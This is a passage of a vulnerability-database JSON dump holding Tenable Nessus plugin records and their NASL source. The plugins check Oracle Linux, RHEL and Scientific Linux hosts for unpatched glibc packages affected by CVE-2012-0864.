"p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/68497", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0393 and \n# Oracle Linux Security Advisory ELSA-2012-0393 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68497);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"Oracle Linux 6 : glibc (ELSA-2012-0393)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0393 :\n\nUpdated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002702.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:14:00", "description": "Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 20, "published": "2012-03-16T00:00:00", "title": "RHEL 6 : glibc (RHSA-2012:0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-16T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/58361", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0393. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58361);\n script_version (\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2012:0393)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2012-0058.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0864\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0393\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:49:32", "description": "The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n - Previously, the dynamic loader generated an incorrect\n ordering for initialization according to the ELF\n specification. This could result in incorrect ordering\n of DSO constructors and destructors. With this update,\n dependency resolution has been fixed.\n\n - Previously, locking of the main malloc arena was\n incorrect in the retry path. This could result in a\n deadlock if an sbrk request failed. With this update,\n locking of the main arena in the retry path has been\n fixed. This issue was exposed by a bug fix provided in a\n previous update.\n\n - Calling memcpy with overlapping arguments on certain\n processors would generate unexpected results. While such\n code is a clear violation of ANSI/ISO standards, this\n update restores prior memcpy behavior.\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 14, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64 (20120315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120315_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61284", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61284);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x i386/x86_64 (20120315)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n - Previously, the dynamic loader generated an incorrect\n ordering for initialization according to the ELF\n specification. This could result in incorrect ordering\n of DSO constructors and destructors. With this update,\n dependency resolution has been fixed.\n\n - Previously, locking of the main malloc arena was\n incorrect in the retry path. This could result in a\n deadlock if an sbrk request failed. With this update,\n locking of the main arena in the retry path has been\n fixed. This issue was exposed by a bug fix provided in a\n previous update.\n\n - Calling memcpy with overlapping arguments on certain\n processors would generate unexpected results. While such\n code is a clear violation of ANSI/ISO standards, this\n update restores prior memcpy behavior.\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=1602\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b0cb7044\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:47:08", "description": "The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain a patch to resolve this issue.", "edition": 13, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120319)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120319_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61285", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61285);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-0864\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120319)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could 